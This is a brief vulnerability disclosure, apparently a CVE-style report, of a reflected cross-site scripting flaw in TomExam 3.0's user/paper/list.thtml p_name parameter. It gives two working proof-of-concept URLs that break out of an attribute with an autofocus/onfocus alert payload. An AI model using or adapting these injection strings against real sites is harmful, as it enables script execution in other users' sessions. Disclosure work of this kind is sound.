Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml
Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml
An authenticated account is required
Login succeeded
user/paper/list.thtml?p_name=%22autofocus+onfocus%3D%22alert%281%29&p_cid=
user/paper/list.thtml?p_name=%22autofocus%20onfocus=%22alert(document.title)&p_cid=